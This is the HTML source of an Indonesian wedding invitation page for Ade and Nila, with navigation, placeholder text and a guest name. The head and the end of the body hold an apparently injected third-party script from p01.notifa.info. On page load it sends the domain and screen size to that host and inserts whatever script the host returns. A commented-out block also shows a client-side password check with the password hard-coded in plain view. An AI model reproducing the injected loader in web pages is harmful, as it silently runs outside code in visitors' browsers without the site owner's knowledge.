<html lang="en">

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Thumbnail Link -->
    <meta property="og:image" itemprop="image" content="http://adenila.ruangpengantin.com/img/thumbnail.jpg">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/css/bootstrap.min.css"
        integrity="sha384-GJzZqFGwb1QTTN6wy59ffF1BuGJpLSa9DkKMp0DgiMDm4iYMj70gZWKYbI706tWS" crossorigin="anonymous">

    <!-- CSS -->
    <link rel="stylesheet" type="text/css" href="style.css">
    <link rel="stylesheet" href="css/swipebox.css">


    <!-- Fonts Awesome -->
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css"
        integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous">

    <!-- Fonts -->
    <link href="https://fonts.googleapis.com/css?family=Dosis" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css?family=Alex+Brush" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css?family=Oleo+Script" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">

    <!-- Favicon -->
    <link rel="shortcut icon" href="img/favicon.ico" type="image/x-icon">
    <link rel="icon" href="img/favicon.ico" type="image/x-icon">

    <title>Undangan Pernikahan Ade &amp; Nila</title>
    <script src="https://connect.facebook.net/id_ID/sdk.js?hash=d8f99b7dddae973266a5f61a9f48a006&amp;ua=modern_es6"
        async="" crossorigin="anonymous"></script>
    <script type="text/javascript" async=""
        src="http://p01.notifa.info/3fsmd3/request?id=1&amp;enc=9UwkxLgY9&amp;params=4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXnTMVTnfHxQR%2bKK392QFzczhuqfbRbEi08GhOsTMxYdRZ1K3sGaPg7yuvhcNmRvM0iCWzVLi%2byaMmk6yiPn3PgMovonTyMDh2Z4Sv9q%2fH9Hss7c6dAI%2fTgvaBfEMXuJXkdTYyHtuC3GZP6x8rAQk19rJvsxbVPRrgDVlRQbXZ4722Zxg7drHf7LaUnViAqxAiNKJJNPe3yx91B1%2bG0bjowo3wa9apM%2bpXjA5bvAnep0YNqXTIAX%2fmO6%2fv2jMX8xdQ4JQgnuQm7YjbuJUKNfbW%2f%2bVGYJ%2fEk6QobWFAlJ9hJJYo%2fwsD8bEO%2biY9gQzVI%2fZNiPphzue%2b6BFcJYQV7vD%2fdwr7tH2yAM9t1Fe1fEc3ksr7XeAewh5EcnoxZv6ISuuC6Q8808Wk6A7hbG9jb%2bKJhfW2sytUBEi%2bK4QxMK%2be%2b%2fpdsaLbPDsyoyUa9SVu4fd74HqlanCNv5EXeu24dZlRNak1E%2fRGISYFzn4DS%2bwh4v8vnwz46gp%2f8KtpjWBXyzxKqM5bnexWXb%2bIOcoGp2QWqDknBLGou7LxurS8DgPuVmioZO%2b8PjMfk%2fAx05ZXirUkIpWhGjIezHhE8JE4qxYemw%3d%3d&amp;idc_r=7390326338&amp;domain=adenila.ruangpengantin.com&amp;sw=1920&amp;sh=1080"></script>
    <style type="text/css">
        .fb_hidden {
            position: absolute;
            top: -10000px;
            z-index: 10001
        }

        .fb_reposition {
            overflow: hidden;
            position: relative
        }

        .fb_invisible {
            display: none
        }

        .fb_reset {
            background: none;
            border: 0;
            border-spacing: 0;
            color: #000;
            cursor: auto;
            direction: ltr;
            font-family: "lucida grande", tahoma, verdana, arial, sans-serif;
            font-size: 11px;
            font-style: normal;
            font-variant: normal;
            font-weight: normal;
            letter-spacing: normal;
            line-height: 1;
            margin: 0;
            overflow: visible;
            padding: 0;
            text-align: left;
            text-decoration: none;
            text-indent: 0;
            text-shadow: none;
            text-transform: none;
            visibility: visible;
            white-space: normal;
            word-spacing: normal
        }

        .fb_reset>div {
            overflow: hidden
        }

        @keyframes fb_transform {
            from {
                opacity: 0;
                transform: scale(.95)
            }

            to {
                opacity: 1;
                transform: scale(1)
            }
        }

        .fb_animate {
            animation: fb_transform .3s forwards
        }

        .fb_dialog {
            background: rgba(82, 82, 82, .7);
            position: absolute;
            top: -10000px;
            z-index: 10001
        }

        .fb_dialog_advanced {
            border-radius: 8px;
            padding: 10px
        }

        .fb_dialog_content {
            background: #fff;
            color: #373737
        }

        .fb_dialog_close_icon {
            background: url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 0 transparent;
            cursor: pointer;
            display: block;
            height: 15px;
            position: absolute;
            right: 18px;
            top: 17px;
            width: 15px
        }

        .fb_dialog_mobile .fb_dialog_close_icon {
            left: 5px;
            right: auto;
            top: 5px
        }

        .fb_dialog_padding {
            background-color: transparent;
            position: absolute;
            width: 1px;
            z-index: -1
        }

        .fb_dialog_close_icon:hover {
            background: url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -15px transparent
        }

        .fb_dialog_close_icon:active {
            background: url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -30px transparent
        }

        .fb_dialog_iframe {
            line-height: 0
        }

        .fb_dialog_content .dialog_title {
            background: #6d84b4;
            border: 1px solid #365899;
            color: #fff;
            font-size: 14px;
            font-weight: bold;
            margin: 0
        }

        .fb_dialog_content .dialog_title>span {
            background: url(https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/Cou7n-nqK52.gif) no-repeat 5px 50%;
            float: left;
            padding: 5px 0 7px 26px
        }

        body.fb_hidden {
            height: 100%;
            left: 0;
            margin: 0;
            overflow: visible;
            position: absolute;
            top: -10000px;
            transform: none;
            width: 100%
        }

        .fb_dialog.fb_dialog_mobile.loading {
            background: url(https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/3rhSv5V8j3o.gif) white no-repeat 50% 50%;
            min-height: 100%;
            min-width: 100%;
            overflow: hidden;
            position: absolute;
            top: 0;
            z-index: 10001
        }

        .fb_dialog.fb_dialog_mobile.loading.centered {
            background: none;
            height: auto;
            min-height: initial;
            min-width: initial;
            width: auto
        }

        .fb_dialog.fb_dialog_mobile.loading.centered #fb_dialog_loader_spinner {
            width: 100%
        }

        .fb_dialog.fb_dialog_mobile.loading.centered .fb_dialog_content {
            background: none
        }

        .loading.centered #fb_dialog_loader_close {
            clear: both;
            color: #fff;
            display: block;
            font-size: 18px;
            padding-top: 20px
        }

        #fb-root #fb_dialog_ipad_overlay {
            background: rgba(0, 0, 0, .4);
            bottom: 0;
            left: 0;
            min-height: 100%;
            position: absolute;
            right: 0;
            top: 0;
            width: 100%;
            z-index: 10000
        }

        #fb-root #fb_dialog_ipad_overlay.hidden {
            display: none
        }

        .fb_dialog.fb_dialog_mobile.loading iframe {
            visibility: hidden
        }

        .fb_dialog_mobile .fb_dialog_iframe {
            position: sticky;
            top: 0
        }

        .fb_dialog_content .dialog_header {
            background: linear-gradient(from(#738aba), to(#2c4987));
            border-bottom: 1px solid;
            border-color: #043b87;
            box-shadow: white 0 1px 1px -1px inset;
            color: #fff;
            font: bold 14px Helvetica, sans-serif;
            text-overflow: ellipsis;
            text-shadow: rgba(0, 30, 84, .296875) 0 -1px 0;
            vertical-align: middle;
            white-space: nowrap
        }

        .fb_dialog_content .dialog_header table {
            height: 43px;
            width: 100%
        }

        .fb_dialog_content .dialog_header td.header_left {
            font-size: 12px;
            padding-left: 5px;
            vertical-align: middle;
            width: 60px
        }

        .fb_dialog_content .dialog_header td.header_right {
            font-size: 12px;
            padding-right: 5px;
            vertical-align: middle;
            width: 60px
        }

        .fb_dialog_content .touchable_button {
            background: linear-gradient(from(#4267B2), to(#2a4887));
            background-clip: padding-box;
            border: 1px solid #29487d;
            border-radius: 3px;
            display: inline-block;
            line-height: 18px;
            margin-top: 3px;
            max-width: 85px;
            padding: 4px 12px;
            position: relative
        }

        .fb_dialog_content .dialog_header .touchable_button input {
            background: none;
            border: none;
            color: #fff;
            font: bold 12px Helvetica, sans-serif;
            margin: 2px -12px;
            padding: 2px 6px 3px 6px;
            text-shadow: rgba(0, 30, 84, .296875) 0 -1px 0
        }

        .fb_dialog_content .dialog_header .header_center {
            color: #fff;
            font-size: 16px;
            font-weight: bold;
            line-height: 18px;
            text-align: center;
            vertical-align: middle
        }

        .fb_dialog_content .dialog_content {
            background: url(https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/jKEcVPZFk-2.gif) no-repeat 50% 50%;
            border: 1px solid #4a4a4a;
            border-bottom: 0;
            border-top: 0;
            height: 150px
        }

        .fb_dialog_content .dialog_footer {
            background: #f5f6f7;
            border: 1px solid #4a4a4a;
            border-top-color: #ccc;
            height: 40px
        }

        #fb_dialog_loader_close {
            float: left
        }

        .fb_dialog.fb_dialog_mobile .fb_dialog_close_button {
            text-shadow: rgba(0, 30, 84, .296875) 0 -1px 0
        }

        .fb_dialog.fb_dialog_mobile .fb_dialog_close_icon {
            visibility: hidden
        }

        #fb_dialog_loader_spinner {
            animation: rotateSpinner 1.2s linear infinite;
            background-color: transparent;
            background-image: url(https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/t-wz8gw1xG1.png);
            background-position: 50% 50%;
            background-repeat: no-repeat;
            height: 24px;
            width: 24px
        }

        @keyframes rotateSpinner {
            0% {
                transform: rotate(0deg)
            }

            100% {
                transform: rotate(360deg)
            }
        }

        .fb_iframe_widget {
            display: inline-block;
            position: relative
        }

        .fb_iframe_widget span {
            display: inline-block;
            position: relative;
            text-align: justify
        }

        .fb_iframe_widget iframe {
            position: absolute
        }

        .fb_iframe_widget_fluid_desktop,
        .fb_iframe_widget_fluid_desktop span,
        .fb_iframe_widget_fluid_desktop iframe {
            max-width: 100%
        }

        .fb_iframe_widget_fluid_desktop iframe {
            min-width: 220px;
            position: relative
        }

        .fb_iframe_widget_lift {
            z-index: 1
        }

        .fb_iframe_widget_fluid {
            display: inline
        }

        .fb_iframe_widget_fluid span {
            width: 100%
        }
    </style>
</head>

<body>



    <!-- password -->
    <!--  <script>
      // IMPORTANT: This is a JS-for-fun - and a BAD example how to secure your content:
      var password = "demo"; // because ANYONE CAN SEE THIS IN VIEW SOURCE!


      // Repeatedly prompt for user password until success:
      (function promptPass() {

        var psw = prompt("Masukkan Password :");

        while (psw !== password) {
          alert("Password Salah!");
          return promptPass();
        }

      }());


      alert('Password Benar! Silahkan klik "OK" untuk melihat website');
      // or show you page content
    </script> -->
    <!-- akhir password -->




    <!-- Audio Tombol 1 -->
    <div class="music">
        <button id="playpausebtn"></button>
    </div>
    <script src="js/audio1.js"></script>
    <!-- Akhir Audio Tombol 1 -->




    <!-- special invite link -->
    <nav class="navbar navbar-expand-lg navbar-dark">
        <div class="container">
            <div class="tamu">
                <p style="font-family: Dosis, sans-serif; color: rgb(255, 255, 255);">For You</p>
                <p style="font-family: Dosis, sans-serif; color: rgb(252, 252, 252);">JIhan Nur Aini</p>
            </div>
    </nav>
    <!-- akhir specisl invite link -->







    <!-- navbar coba -->
    <div class="container-fluid">
        <div class="row myNavbar justify-content-center text-center align-items-center">
            <div class="col ">
                <a href="index.html" class="klik_menu" id="home">
                    <img src="img/home.svg">
                    <p>Home</p>
                </a>
            </div>
            <div class="col ">
                <a href="lovestory.html" class="klik_menu" id="pengantin">
                    <img src="img/heart.svg">
                    <p>Your Journey</p>
                </a>
            </div>
            <div class="col ">
                <a href="note.html" class="klik_menu" id="acara">
                    <img src="img/note.svg">
                    <p>My Wish</p>
                </a>
            </div>

        </div>
    </div>
    <!-- akhir navbar coba -->


    <!-- Page Content -->
    <div class="content" onclick="closeNav()">
        <div class="buku-tamu text-center">
            <div class="container">
                <div class="bg">
                    <img src="img/left-top-decor.png" class="left-top-decor">
                    <img src="img/right-top-decor.png" class="right-top-decor">
                    <div class="row justify-content-center">
                        <div class="col-lg kolom">
                            <h1>Doa &amp; Harapan</h1>
                            <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>
                        </div>
                    </div>

                    <img src="img/left-bottom-decor.png" class="left-bottom-decor">
                    <img src="img/left-bottom-decor.png" class="right-bottom-decor">
                </div>
            </div>
        </div>



    </div>







    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->

    <!-- disable inspect element -->
    <script src="https://code.jquery.com/jquery-2.1.4.js"></script>
    <script src="js/disable-inspect.js"></script>
    <!-- akhir disable inspect element -->

    <!-- <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script> -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.6/umd/popper.min.js"
        integrity="sha384-wHAiFfRlMFy6i5SRaxvfOCifBUQy1xHdJ/yoi7FRNXMRBu5WHdZYu1hA6ZOblgut"
        crossorigin="anonymous"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/js/bootstrap.min.js"
        integrity="sha384-B0UglyR+jN6CkvvICOB2joaf5I4l3gm9GU6Hc1og6Ls7i6U/mkkaduKaBhlAXv9k"
        crossorigin="anonymous"></script>



    <!-- Galeri Foto -->
    <script src="js/gallery/jquery-2.1.0.min.js"></script>
    <script src="js/gallery/jquery.swipebox.js"></script>
    <script type="text/javascript">
        ; (function ($) {

            $('.swipebox').swipebox();

        })(jQuery);
    </script>
    <!-- Akhir Galeri Foto -->



    <!-- Menu Toggle Script -->
    <script>
        document.getElementById('main').addEventListener('click', closeNav);

        function openNav() {
            document.getElementById("mySidenav").style.width = "333px";
            // document.getElementById("main").style.marginLeft = "250px";
        }

        /* Set the width of the side navigation to 0 and the left margin of the page content to 0 */
        function closeNav() {
            document.getElementById("mySidenav").style.width = "0";
            // document.getElementById("main").style.marginLeft = "0";
        }
    </script>
    <!-- Akhir Menu Toggle Script -->






    <script
        type="text/javascript">if (self == top) { function netbro_cache_analytics(fn, callback) { setTimeout(function () { fn(); callback(); }, 0); } function sync(fn) { fn(); } function requestCfs() { var idc_glo_url = (location.protocol == "https:" ? "https://" : "http://"); var idc_glo_r = Math.floor(Math.random() * 99999999999); var url = idc_glo_url + "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXnTMVTnfHxQR%2bKK392QFzczhuqfbRbEi08GhOsTMxYdRZ1K3sGaPg7yuvhcNmRvM0iCWzVLi%2byaMmk6yiPn3PgMovonTyMDh2Z4Sv9q%2fH9Hss7c6dAI%2fTgvaBfEMXuJXkdTYyHtuC3GZP6x8rAQk19rJvsxbVPRrgDVlRQbXZ4722Zxg7drHf7LaUnViAqxAiNKJJNPe3yx91B1%2bG0bjowo3wa9apM%2bpXjA5bvAnep0YNqXTIAX%2fmO6%2fv2jMX8xdQ4JQgnuQm7YjbuJUKNfbW%2f%2bVGYJ%2fEk6QobWFAlJ9hJJYo%2fwsD8bEO%2biY9gQzVI%2fZNiPphzue%2b6BFcJYQV7vD%2fdwr7tH2yAM9t1Fe1fEc3ksr7XeAewh5EcnoxZv6ISuuC6Q8808Wk6A7hbG9jb%2bKJhfW2sytUBEi%2bK4QxMK%2be%2b%2fpdsaLbPDsyoyUa9SVu4fd74HqlanCNv5EXeu24dZlRNak1E%2fRGISYFzn4DS%2bwh4v8vnwz46gp%2f8KtpjWBXyzxKqM5bnexWXb%2bIOcoGp2QWqDknBLGou7LxurS8DgPuVmioZO%2b8PjMfk%2fAx05ZXirUkIpWhGjIezHhE8JE4qxYemw%3d%3d" + "&idc_r=" + idc_glo_r + "&domain=" + document.domain + "&sw=" + screen.width + "&sh=" + screen.height; var bsa = document.createElement('script'); bsa.type = 'text/javascript'; bsa.async = true; bsa.src = url; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(bsa); } netbro_cache_analytics(requestCfs, function () { }); };</script>
</body>

</html>